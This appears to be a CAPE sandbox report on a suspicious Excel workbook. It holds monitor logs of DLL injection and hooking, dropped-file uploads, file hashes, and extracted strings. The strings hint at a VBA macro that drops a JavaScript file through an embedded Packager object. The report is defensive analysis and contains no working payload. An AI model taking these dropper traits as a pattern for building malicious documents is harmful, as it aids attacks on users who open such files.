2025-12-06 18:06:01,589 [root] DEBUG: 4804: OpenProcessHandler: Injection info created for process 4336, handle 0xc38: Error obtaining target process name
2025-12-06 18:06:01,589 [root] DEBUG: Error 5 (0x5) - OpenProcessHandler: Error obtaining target process name: Access is denied.
2025-12-06 18:06:01,589 [root] DEBUG: 4804: OpenProcessHandler: Injection info created for process 4432, handle 0x1e10: Error obtaining target process name
2025-12-06 18:06:06,667 [root] DEBUG: 3476: api-cap: GetAsyncKeyState hook disabled due to count: 5000
2025-12-06 18:06:10,011 [root] DEBUG: 4804: OpenProcessHandler: Image base for process 4336 (handle 0xc10): 0x00007FF6AE2A0000.
2025-12-06 18:06:10,011 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat
2025-12-06 18:06:10,027 [root] DEBUG: 3476: DLL loaded at 0x67F70000: C:\Windows\SYSTEM32\sxs (0x87000 bytes).
2025-12-06 18:06:11,042 [root] DEBUG: 4804: OpenProcessHandler: Image base for process 3476 (handle 0xc10): 0x00000000002E0000.
2025-12-06 18:06:35,496 [root] DEBUG: 3476: CreateProcessHandler: Injection info set for new process 3304: C:\Windows\splwow64.exe, ImageBase: 0x00000000
2025-12-06 18:06:35,496 [root] INFO: Announced 64-bit process name: splwow64.exe pid: 3304
2025-12-06 18:06:35,496 [lib.api.process] INFO: Monitor config for <Process 3304 splwow64.exe>: C:\tmpodgh_435\dll\3304.ini
2025-12-06 18:06:35,496 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmpodgh_435\dll\LHradFS.dll, loader C:\tmpodgh_435\bin\hirsWgiZ.exe
2025-12-06 18:06:35,496 [root] DEBUG: Loader: Injecting process 3304 (thread 1652) with C:\tmpodgh_435\dll\LHradFS.dll.
2025-12-06 18:06:35,496 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-06 18:06:35,496 [root] DEBUG: Successfully injected DLL C:\tmpodgh_435\dll\LHradFS.dll.
2025-12-06 18:06:35,496 [lib.api.process] INFO: Injected into 64-bit <Process 3304 splwow64.exe>
2025-12-06 18:06:35,511 [root] DEBUG: 3304: Python path set to 'C:\Python38'.
2025-12-06 18:06:35,511 [root] DEBUG: 3304: Dropped file limit defaulting to 100.
2025-12-06 18:06:35,511 [root] INFO: Disabling sleep skipping.
2025-12-06 18:06:35,511 [root] DEBUG: 3304: YaraInit: Compiled rules loaded from existing file C:\tmpodgh_435\data\yara\capemon.yac
2025-12-06 18:06:35,511 [root] DEBUG: 3304: GetAddressByYara: ModuleBase 0x00007FFCF7D30000 FunctionName RtlInsertInvertedFunctionTable
2025-12-06 18:06:35,527 [root] DEBUG: 3304: RtlInsertInvertedFunctionTable 0x00007FFCF7D4090E, LdrpInvertedFunctionTableSRWLock 0x00007FFCF7E9D510
2025-12-06 18:06:35,527 [root] DEBUG: 3304: YaraScan: Scanning 0x00007FF6C66E0000, size 0x2c346
2025-12-06 18:06:35,527 [root] DEBUG: Error 5 (0x5) - AmsiDumper: Is CAPE agent running elevated? Initialisation failed: Access is denied.
2025-12-06 18:06:35,527 [root] DEBUG: 3304: Monitor initialised: 64-bit capemon loaded in process 3304 at 0x00007FFCD3CD0000, thread 1652, image base 0x00007FF6C66E0000, stack from 0x00000000004E5000-0x00000000004F0000
2025-12-06 18:06:35,527 [root] DEBUG: 3304: Commandline: C:\Windows\splwow64.exe 8192
2025-12-06 18:06:35,543 [root] DEBUG: 3304: hook_api: LdrpCallInitRoutine export address 0x00007FFCF7D499BC obtained via GetFunctionAddress
2025-12-06 18:06:35,543 [root] DEBUG: 3304: hook_api: Warning - CoCreateInstance export address 0x00007FFCF69442CB differs from GetProcAddress -> 0x00007FFCF64AA420 (combase.dll::0x2a420)
2025-12-06 18:06:35,543 [root] DEBUG: 3304: hook_api: Warning - CoCreateInstanceEx export address 0x00007FFCF694430A differs from GetProcAddress -> 0x00007FFCF6524180 (combase.dll::0xa4180)
2025-12-06 18:06:35,543 [root] DEBUG: 3304: hook_api: Warning - CoGetClassObject export address 0x00007FFCF694489A differs from GetProcAddress -> 0x00007FFCF64AEB00 (combase.dll::0x2eb00)
2025-12-06 18:06:35,543 [root] DEBUG: 3304: hook_api: Warning - CLSIDFromProgID export address 0x00007FFCF6943B16 differs from GetProcAddress -> 0x00007FFCF6528570 (combase.dll::0xa8570)
2025-12-06 18:06:35,543 [root] DEBUG: 3304: hook_api: Warning - CLSIDFromProgIDEx export address 0x00007FFCF6943B53 differs from GetProcAddress -> 0x00007FFCF6528A40 (combase.dll::0xa8a40)
2025-12-06 18:06:35,543 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-06 18:06:35,543 [root] DEBUG: 3304: set_hooks: Unable to hook LockResource
2025-12-06 18:06:35,558 [root] DEBUG: 3304: Hooked 605 out of 606 functions
2025-12-06 18:06:35,558 [root] DEBUG: 3304: Syscall hook installed, syscall logging level 1
2025-12-06 18:06:35,558 [root] INFO: Loaded monitor into process with pid 3304
2025-12-06 18:06:35,558 [root] DEBUG: 3304: caller_dispatch: Added region at 0x00007FF6C66E0000 to tracked regions list (kernel32::SetUnhandledExceptionFilter returns to 0x00007FF6C66F28F1, thread 1652).
2025-12-06 18:06:35,558 [root] DEBUG: 3304: YaraScan: Scanning 0x00007FF6C66E0000, size 0x2c346
2025-12-06 18:06:35,558 [root] DEBUG: 3304: ProcessImageBase: Main module image at 0x00007FF6C66E0000 unmodified (entropy change 0.000000e+00)
2025-12-06 18:06:35,558 [root] DEBUG: 3304: DLL loaded at 0x00007FFCDE4D0000: C:\Windows\SYSTEM32\SPOOLSS (0x1f000 bytes).
2025-12-06 18:06:35,558 [root] DEBUG: 3304: set_hooks_by_export_directory: Hooked 0 out of 606 functions
2025-12-06 18:06:35,558 [root] DEBUG: 3304: DLL loaded at 0x00007FFCDE490000: C:\Windows\SYSTEM32\PrintIsolationProxy (0x1d000 bytes).
2025-12-06 18:06:35,574 [root] DEBUG: 3304: set_hooks_by_export_directory: Hooked 0 out of 606 functions
2025-12-06 18:06:35,574 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF32E0000: C:\Windows\SYSTEM32\kernel.appcore (0x12000 bytes).
2025-12-06 18:06:35,574 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF5610000: C:\Windows\System32\bcryptPrimitives (0x82000 bytes).
2025-12-06 18:06:35,574 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF6280000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2025-12-06 18:06:35,683 [root] DEBUG: Error 5 (0x5) - OpenProcessHandler: Error obtaining target process name: Access is denied.
2025-12-06 18:06:35,683 [root] DEBUG: 3304: OpenProcessHandler: Injection info created for process 3476, handle 0x2c4: Error obtaining target process name
2025-12-06 18:06:35,698 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF7830000: C:\Windows\System32\OLEAUT32 (0xcd000 bytes).
2025-12-06 18:06:35,698 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEB580000: C:\Windows\SYSTEM32\VERSION (0xa000 bytes).
2025-12-06 18:06:35,698 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0EA0000: C:\Windows\SYSTEM32\prntvpt (0x32000 bytes).
2025-12-06 18:06:35,698 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF52D0000: C:\Windows\SYSTEM32\USERENV (0x2e000 bytes).
2025-12-06 18:06:35,698 [root] DEBUG: 3304: DLL loaded at 0x00007FFCD3910000: C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_cce2ae2d764e8510\Amd64\PrintConfig (0x3b4000 bytes).
2025-12-06 18:06:35,714 [root] DEBUG: 3304: api-rate-cap: memcpy hook disabled due to rate
2025-12-06 18:06:35,730 [root] DEBUG: 3304: DLL loaded at 0x00007FFCE4590000: C:\Windows\System32\msxml6 (0x25f000 bytes).
2025-12-06 18:06:35,745 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEDED0000: C:\Windows\System32\iertutil (0x2b1000 bytes).
2025-12-06 18:06:35,745 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEDEA0000: C:\Windows\System32\srvcli (0x28000 bytes).
2025-12-06 18:06:35,745 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF4950000: C:\Windows\System32\netutils (0xc000 bytes).
2025-12-06 18:06:35,745 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEE210000: C:\Windows\SYSTEM32\urlmon (0x1ec000 bytes).
2025-12-06 18:06:35,761 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF2DF0000: C:\Windows\system32\uxtheme (0x9e000 bytes).
2025-12-06 18:06:35,776 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0E40000: C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\VCRUNTIME140 (0x1b000 bytes).
2025-12-06 18:06:35,776 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0E30000: C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\VCRUNTIME140_1 (0xc000 bytes).
2025-12-06 18:06:35,776 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0E60000: C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLMF (0x13000 bytes).
2025-12-06 18:06:35,823 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF5AE0000: C:\Windows\System32\cfgmgr32 (0x4e000 bytes).
2025-12-06 18:06:35,823 [root] DEBUG: 3304: DLL loaded at 0x00007FFCE61A0000: C:\Windows\SYSTEM32\Print.PrintSupport.Source (0x61000 bytes).
2025-12-06 18:06:35,870 [root] DEBUG: 3304: DLL loaded at 0x00007FFCE2160000: C:\Windows\System32\jscript (0xd6000 bytes).
2025-12-06 18:06:35,870 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEA140000: C:\Windows\SYSTEM32\amsi (0x1f000 bytes).
2025-12-06 18:06:35,870 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF5350000: C:\Windows\SYSTEM32\profapi (0x1f000 bytes).
2025-12-06 18:06:35,870 [root] DEBUG: 3304: DLL loaded at 0x00007FFCE9820000: C:\Program Files\Windows Defender\MpOav (0x44000 bytes).
2025-12-06 18:06:35,902 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF51B0000: C:\Windows\SYSTEM32\sxs (0xa2000 bytes).
2025-12-06 18:06:35,948 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEA140000: C:\Windows\SYSTEM32\amsi (0x1f000 bytes).
2025-12-06 18:06:35,964 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEA140000: C:\Windows\SYSTEM32\amsi (0x1f000 bytes).
2025-12-06 18:06:36,027 [root] DEBUG: 3304: DLL loaded at 0x00007FFCE5E70000: C:\Windows\SYSTEM32\DWrite (0x27f000 bytes).
2025-12-06 18:06:36,027 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0DA0000: C:\Windows\SYSTEM32\XmlLite (0x36000 bytes).
2025-12-06 18:06:36,027 [root] DEBUG: 3304: DLL loaded at 0x00007FFCE2080000: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_8c12706b076a4ca4\Amd64\mxdwdrv (0xd1000 bytes).
2025-12-06 18:06:36,058 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEF220000: C:\Windows\System32\OneCoreUAPCommonProxyStub (0x7cd000 bytes).
2025-12-06 18:06:36,074 [root] DEBUG: 3304: DLL loaded at 0x00007FFCD31A0000: C:\Windows\SYSTEM32\opcservices (0x21d000 bytes).
2025-12-06 18:06:36,089 [root] DEBUG: 3304: DLL loaded at 0x00007FFCD2EE0000: C:\Windows\SYSTEM32\xpsservices (0x2bc000 bytes).
2025-12-06 18:06:36,089 [root] DEBUG: 3304: DLL loaded at 0x00007FFCE56B0000: C:\Windows\SYSTEM32\XpsPushLayer (0x60000 bytes).
2025-12-06 18:06:36,136 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0E00000: C:\Windows\system32\FontSub (0x23000 bytes).
2025-12-06 18:06:36,167 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEA140000: C:\Windows\SYSTEM32\amsi (0x1f000 bytes).
2025-12-06 18:06:36,214 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0DF0000: C:\Windows\SYSTEM32\MSIMG32 (0x7000 bytes).
2025-12-06 18:06:36,214 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF7070000: C:\Windows\System32\SHELL32 (0x744000 bytes).
2025-12-06 18:06:36,214 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0570000: C:\Windows\system32\compstui (0x23000 bytes).
2025-12-06 18:06:36,214 [root] DEBUG: 3304: DLL loaded at 0x00007FFCE94A0000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e\comctl32 (0x29a000 bytes).
2025-12-06 18:06:36,230 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF4DF0000: C:\Windows\SYSTEM32\Wldp (0x2e000 bytes).
2025-12-06 18:06:36,230 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF34E0000: C:\Windows\SYSTEM32\windows.storage (0x793000 bytes).
2025-12-06 18:06:36,230 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEA140000: C:\Windows\SYSTEM32\amsi (0x1f000 bytes).
2025-12-06 18:06:36,261 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEA140000: C:\Windows\SYSTEM32\amsi (0x1f000 bytes).
2025-12-06 18:06:36,292 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0DF0000: C:\Windows\SYSTEM32\MSIMG32 (0x7000 bytes).
2025-12-06 18:06:36,292 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF7070000: C:\Windows\System32\SHELL32 (0x744000 bytes).
2025-12-06 18:06:36,292 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF0570000: C:\Windows\system32\compstui (0x23000 bytes).
2025-12-06 18:06:36,308 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF4DF0000: C:\Windows\SYSTEM32\Wldp (0x2e000 bytes).
2025-12-06 18:06:36,308 [root] DEBUG: 3304: DLL loaded at 0x00007FFCF34E0000: C:\Windows\SYSTEM32\windows.storage (0x793000 bytes).
2025-12-06 18:06:36,308 [root] DEBUG: 3304: DLL loaded at 0x00007FFCEA140000: C:\Windows\SYSTEM32\amsi (0x1f000 bytes).
2025-12-06 18:07:00,120 [root] DEBUG: 4804: DLL loaded at 0x00007FFCE5780000: C:\Windows\System32\Windows.Globalization (0x1a6000 bytes).
2025-12-06 18:07:00,136 [root] DEBUG: 4804: DLL loaded at 0x00007FFCD6F30000: C:\Windows\System32\icu (0x22e000 bytes).
2025-12-06 18:07:00,136 [root] DEBUG: 4804: api-rate-cap: memcpy hook disabled due to rate
2025-12-06 18:07:01,902 [root] DEBUG: 3476: DLL loaded at 0x67F10000: C:\Windows\System32\oleacc (0x53000 bytes).
2025-12-06 18:07:44,980 [root] DEBUG: 4804: OpenProcessHandler: Image base for process 4432 (handle 0x600): 0x00007FF7FAF50000.
2025-12-06 18:07:45,011 [root] DEBUG: 4804: DLL loaded at 0x00007FFCDBBD0000: C:\Windows\SYSTEM32\capauthz (0x51000 bytes).
2025-12-06 18:07:45,042 [root] DEBUG: 4804: api-rate-cap: GetSystemMetrics hook disabled due to rate
2025-12-06 18:07:45,058 [root] DEBUG: 4804: DLL loaded at 0x00007FFCF0DF0000: C:\Windows\System32\NPSMDesktopProvider (0x38000 bytes).
2025-12-06 18:07:45,073 [root] DEBUG: 4804: DLL loaded at 0x00007FFCE5490000: C:\Windows\System32\CapabilityAccessManagerClient (0x3f000 bytes).
2025-12-06 18:07:45,073 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
2025-12-06 18:07:45,089 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db
2025-12-06 18:07:45,136 [root] DEBUG: 4804: DLL loaded at 0x00007FFCF0590000: C:\Windows\System32\WppRecorderUM (0x7000 bytes).
2025-12-06 18:07:45,152 [root] DEBUG: 4804: DLL loaded at 0x00007FFCE2FD0000: C:\Windows\System32\BthAvctpSvc (0x64000 bytes).
2025-12-06 18:08:33,292 [root] INFO: Analysis timeout hit, terminating analysis
2025-12-06 18:08:33,292 [lib.api.process] INFO: Terminate event set for <Process 3476 EXCEL.EXE>
2025-12-06 18:08:33,292 [root] DEBUG: 3476: Terminate Event: Attempting to dump process 3476
2025-12-06 18:08:33,323 [root] DEBUG: 3476: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-06 18:08:33,339 [root] DEBUG: 3476: Terminate Event: Current region empty
2025-12-06 18:08:33,339 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
2025-12-06 18:08:33,339 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
2025-12-06 18:08:33,339 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db
2025-12-06 18:08:33,339 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S
2025-12-06 18:08:33,339 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\1380790193167760279.C4
2025-12-06 18:08:33,339 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\26bd031cb4a5333bbd77.xls
2025-12-06 18:08:33,339 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1765109128236847900_D97DA1AE-2C1A-4825-BB08-AB4D047678BC.log
2025-12-06 18:08:33,339 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1765109128235947300_D97DA1AE-2C1A-4825-BB08-AB4D047678BC.log
2025-12-06 18:08:33,339 [lib.api.process] INFO: Termination confirmed for <Process 3476 EXCEL.EXE>
2025-12-06 18:08:33,339 [root] INFO: Terminate event set for process 3476
2025-12-06 18:08:33,339 [root] DEBUG: 3476: Terminate Event: CAPE shutdown complete for process 3476
2025-12-06 18:08:33,339 [lib.api.process] INFO: Terminate event set for <Process 4804 explorer.exe>
2025-12-06 18:08:33,339 [root] DEBUG: 4804: Terminate Event: Attempting to dump process 4804
2025-12-06 18:08:33,339 [root] DEBUG: 4804: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-06 18:08:33,355 [root] DEBUG: 4804: Terminate Event: Current region empty
2025-12-06 18:08:33,355 [lib.api.process] INFO: Termination confirmed for <Process 4804 explorer.exe>
2025-12-06 18:08:33,355 [root] INFO: Terminate event set for process 4804
2025-12-06 18:08:33,355 [root] DEBUG: 4804: Terminate Event: CAPE shutdown complete for process 4804
2025-12-06 18:08:33,355 [lib.api.process] INFO: Terminate event set for <Process 3304 splwow64.exe>
2025-12-06 18:08:33,355 [root] DEBUG: 3304: Terminate Event: Attempting to dump process 3304
2025-12-06 18:08:33,355 [root] DEBUG: 3304: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-06 18:08:33,355 [root] DEBUG: 3304: Terminate Event: Current region empty
2025-12-06 18:08:33,355 [lib.api.process] INFO: Termination confirmed for <Process 3304 splwow64.exe>
2025-12-06 18:08:33,355 [root] INFO: Terminate event set for process 3304
2025-12-06 18:08:33,355 [root] INFO: Created shutdown mutex
2025-12-06 18:08:33,355 [root] DEBUG: 3304: Terminate Event: CAPE shutdown complete for process 3304
2025-12-06 18:08:34,370 [root] INFO: Shutting down package
2025-12-06 18:08:34,370 [root] INFO: Stopping auxiliary modules
2025-12-06 18:08:34,370 [root] INFO: Stopping auxiliary module: Browser
2025-12-06 18:08:34,370 [root] INFO: Stopping auxiliary module: Curtain
2025-12-06 18:08:34,370 [modules.auxiliary.curtain] ERROR: Curtain - Error collecting PowerShell events - [Errno 13] Permission denied: 'C:\\curtain.log'
2025-12-06 18:08:34,370 [modules.auxiliary.curtain] ERROR: Curtain log file not found!
2025-12-06 18:08:34,370 [root] INFO: Stopping auxiliary module: End_noisy_tasks
2025-12-06 18:08:34,370 [root] INFO: Stopping auxiliary module: Evtx
2025-12-06 18:08:34,370 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Application.evtx to zip dump
2025-12-06 18:08:34,370 [root] WARNING: Cannot terminate auxiliary module Evtx: [Errno 13] Permission denied: 'C:/windows/Sysnative/winevt/Logs\\Application.evtx'
2025-12-06 18:08:34,370 [root] INFO: Stopping auxiliary module: Human
2025-12-06 18:08:44,371 [root] WARNING: Failed to join {aux} thread.
2025-12-06 18:08:44,371 [root] INFO: Stopping auxiliary module: Pre_script
2025-12-06 18:08:44,371 [root] INFO: Stopping auxiliary module: Screenshots
2025-12-06 18:08:46,371 [root] INFO: Stopping auxiliary module: Usage
2025-12-06 18:08:47,386 [root] INFO: Stopping auxiliary module: During_script
2025-12-06 18:08:47,386 [root] INFO: Finishing auxiliary modules
2025-12-06 18:08:47,386 [root] INFO: Shutting down pipe server and dumping dropped files
2025-12-06 18:08:47,386 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres to files\165a14c4211c59d3a649c89b660abbab4870f2374da66dad63c66c87a0585a9a; Size is 4542; Max size: 100000000
2025-12-06 18:08:47,402 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres to files\008ed33161308b43eefcf92c20a61f4c8011b4b4dc442166b0983eda1ca7171e; Size is 2278; Max size: 100000000
2025-12-06 18:08:47,402 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres to files\c89119f888f768aa62144c25130da51968b4284385438de8bdba2aba72a38bd7; Size is 2684; Max size: 100000000
2025-12-06 18:08:47,402 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat to files\7ab4047101e2ba8d04f95bdc33242687832ad63d7c2fcc899bd36065e6e48d9c; Size is 996; Max size: 100000000
2025-12-06 18:08:47,402 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db to files\d97ec017e99ed9ce08101b2a6cfbc5d86bd8d3291a85fba1ba7cd57fb385079b; Size is 14688; Max size: 100000000
2025-12-06 18:08:47,402 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db to files\1ec69c5de90d598e705eae66838f799a21df5b59f56a632bcadbfee88196ce4c; Size is 1048576; Max size: 100000000
2025-12-06 18:08:47,402 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm to files\fe61c62de2bd06296cf0e0279200e3c4b7bb0f39a57f5bfaf8cf6ea91e83a118; Size is 32768; Max size: 100000000
2025-12-06 18:08:47,417 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal to files\c3cfd356fa7e937c880c45f0e5280eacd61eae5fe16d2ef9c36f631e56442201; Size is 4152; Max size: 100000000
2025-12-06 18:08:47,433 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db to files\a8f257b04613cd3d2aadbf2fa760f19b79721663778fb44491195cd3c9d67a5f; Size is 36864; Max size: 100000000
2025-12-06 18:08:47,448 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S to files\5731b3c6150d3b250b3afe664a2f9ae545a2ebe4986caba82f1871e95b46712f; Size is 103; Max size: 100000000
2025-12-06 18:08:47,448 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\1380790193167760279.C4 to files\c35020473aed1b4642cd726cad727b63fff2824ad68cedd7ffb73c7cbd890479; Size is 32768; Max size: 100000000
2025-12-06 18:08:47,448 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\26bd031cb4a5333bbd77.xls to files\e1fe3d20073f9cf7d378bb23ca4dcbb77dc1fc3a7dcf89c04d484f0176286f14; Size is 38400; Max size: 100000000
2025-12-06 18:08:47,496 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1765109128236847900_D97DA1AE-2C1A-4825-BB08-AB4D047678BC.log to files\cd52d81e25f372e6fa4db2c0dfceb59862c1969cab17096da352b34950c973cc; Size is 20971520; Max size: 100000000
2025-12-06 18:08:47,621 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1765109128235947300_D97DA1AE-2C1A-4825-BB08-AB4D047678BC.log to files\72d2565ff3783923ee1849252b6e6df7213790f31ab0a9251fac69289334f66f; Size is 20971520; Max size: 100000000
2025-12-06 18:08:47,702 [root] WARNING: Folder at path "C:\obthVYLcwy\debugger" does not exist, skipping
2025-12-06 18:08:47,702 [root] WARNING: Folder at path "C:\obthVYLcwy\tlsdump" does not exist, skipping
2025-12-06 18:08:47,702 [root] INFO: Analysis completed

Machine

Name	Label	Manager	Started On	Shutdown On	Route
win10-64bit-tiny-1	win10-64bit-tiny-1	KVM	2025-12-09 15:09:42	2025-12-09 15:13:06	inetsim

File Details

File Name	26bd031cb4a5333bbd77.xls
File Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eng Moha, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:17:20 2015, Last Saved Time/Date: Thu Mar 17 16:58:54 2022, Security: 0
File Size	38400 bytes
MD5	678b736d27eee36ebcf6c0843d9cb83a
SHA1	57cdf9dbc688ad5796a92c10b3b74d9155763de9
SHA256	26bd031cb4a5333bbd77698f5aaf737cb108b4b9d30670d92218a8c31ec0abc7 [VT] [MWDB] [Bazaar]
SHA3-384	03230d724a1ae6ce56df64259ea0006cac358c3a9c9e516dc19aaf9989472244498a67be9bd96ed4cedeca3e07d474a0
CRC32	882027E3
TLSH	T1EE0382A2B7D6D80AD99A03794CE6C7E63627FC615F63834B3249F70E1F71A808903617
Ssdeep	768:Fvmk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJyUVs+mFz+JBgj:Qk3hOdsylKlgxopeiBNhZFGzE+cL2kde
Office	File Strings BinGraph Vba2Graph XLMMacros

Comma

Paste

to fo

|Global!

!sAm(

GetObjectz

hB.}

UniresDLL

|Global

ells(2,

Calibri Light1

N0{00020819-0000-0000-C000-000000000046}

[Content_Types].xml

sWorkboo

Environ

theme/theme/theme1.xml

Document=Sheet1/&H00000000

, hbhwoo0

cMv()

40% - Accent2

Neutral

lateDeri

?333333

04C-5BFA

Files\Co

vokeVerb

Cells

Excel.Sheet.8

9stdol

Title

DINU"

Orientation

VersionCompatible32="393222000"

C:\Users\ADMINI~1\AppData\Local\Temp\{B7581DBA-69AB-4CBF-998D-69D808AADCAC}\FgCHe.txt

"$"#,##0.00_);[Red]$"$"#,##0.00$

Project1

PROJECT

theme/theme/_rels/themeManager.xml.rels

02642fe95b

40% - Accent5

*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation

Win16

{0002043

Total

"$"#,##0_);$"$"#,##0$

Heading 3

;_(@_)

RESDLL

_VBA_PROJECT

Libra,ry

%;@tF

PaperSize

lWKUE

0#0#C:\W

Ole10Native

Accent5

theme/theme/themeManager.xmlPK

e2.tlb#O

SummaryInformation

60% - Accent3

Explanatory Text

InvokeVerb

ation

Biff8

FgCHe.txt

Bustom

gram

Accent3

Percent

Rectangle 5

AppData

ok/&H00000000

drs/shapexml.xmlPK

Object

Resolution

2Sub B

+ "\FgC@He.js"

;_(@_) }

Heading 1

"$"#,##0.00_);$"$"#,##0.00$

Sheet1

B|SheetT1G

theme/theme/themeManager.xml

kThisWorkbook

20% - Accent1

Accent6

-IOHz

0{00020P819-

drs/shapexml.xml

Color

Heading 2

theme/theme/_rels/themeManager.xml.relsPK

Workbook_Activateg

LETTER

Packager Shell Object

Root Entry

20% - Accent3

[Content_Types].xmlPK

Pre decla

im lWKUE

0046}#2.

Sheet1=0, 0, 0, 0, C

CompObj

e VB_Nam

Office

ZDA=(A

dCreat

*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library

MbP?_

